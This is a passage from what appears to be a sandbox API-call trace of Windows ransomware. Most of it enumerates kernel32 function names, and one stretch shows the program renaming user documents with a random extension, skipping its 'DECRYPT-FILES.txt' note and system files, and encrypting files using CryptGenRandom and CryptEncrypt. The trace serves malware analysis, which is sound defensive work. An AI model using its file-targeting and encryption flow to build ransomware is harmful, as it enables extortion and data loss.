lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.606] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.606] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.606] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.606] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.606] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.606] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.606] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.606] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.606] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.606] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.606] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.606] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.606] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.606] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.606] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.606] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.607] lstrlenA (lpString="DELETEATOM") returned 10 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.607] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.607] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.607] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.607] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.607] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.607] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.607] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.607] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.607] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.607] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.607] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.607] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.607] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.607] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.607] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.607] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.607] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.607] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.607] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.608] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.608] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.608] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.608] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.608] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.608] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.608] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.608] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.608] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.608] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.608] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.608] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.608] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.608] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.608] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.608] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.608] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.608] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.608] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.608] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.609] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.609] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.609] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.609] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.609] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.609] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.609] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.609] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.609] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf") returned 88 [0084.609] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf.2PdM3d") returned 95 [0084.609] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\l16gl4lrs.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf.2PdM3d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\l16gl4lrs.rtf.2pdm3d"), dwFlags=0x0) returned 1 [0084.612] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.613] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.613] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.613] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdef6a930, ftCreationTime.dwHighDateTime=0x1d4c5fa, ftLastAccessTime.dwLowDateTime=0x2dc82740, ftLastAccessTime.dwHighDateTime=0x1d4d222, ftLastWriteTime.dwLowDateTime=0x2dc82740, ftLastWriteTime.dwHighDateTime=0x1d4d222, nFileSizeHigh=0x0, nFileSizeLow=0x17dfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z1Ci0uT2mheh7iNWJ6Ft.docx", cAlternateFileName="Z1CI0U~1.DOC")) returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="autorun.inf") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="boot.ini") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="desktop.ini") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="ntuser.dat") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="iconcache.db") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="bootsect.bak") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="ntuser.dat.log") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="thumbs.db") returned 1 [0084.613] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx", lpString2="Bootfont.bin") returned 1 [0084.613] lstrlenW (lpString="Z1Ci0uT2mheh7iNWJ6Ft.docx") returned 25 [0084.613] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.613] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.613] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.613] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.614] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.614] lstrlenW (lpString="Z1Ci0uT2mheh7iNWJ6Ft.docx") returned 25 [0084.614] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0084.614] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="Z1Ci0uT2mheh7iNWJ6Ft.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx" [0084.614] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\z1ci0ut2mheh7inwj6ft.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.614] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=97789) returned 1 [0084.614] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.614] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.614] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.615] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.615] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.616] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.617] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.618] CloseHandle (hObject=0x43c) returned 1 [0084.618] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.618] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.619] CloseHandle (hObject=0x0) returned 0 [0084.619] CloseHandle (hObject=0x438) returned 1 [0084.619] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.619] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.619] GetTickCount () returned 0x114d9dc [0084.619] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.619] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.619] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.620] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.620] lstrlenA (lpString="kernel32.dll") returned 12 [0084.620] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.620] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.620] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.620] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.620] lstrlenA (lpString="ADDATOMA") returned 8 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.620] lstrlenA (lpString="ADDATOMW") returned 8 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.620] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.620] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.620] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.621] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.621] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.621] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.621] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.621] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.621] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.621] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.621] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.621] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.621] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.621] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.621] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.621] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.621] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.621] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.621] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.621] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.621] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.621] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.621] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.622] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.622] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") 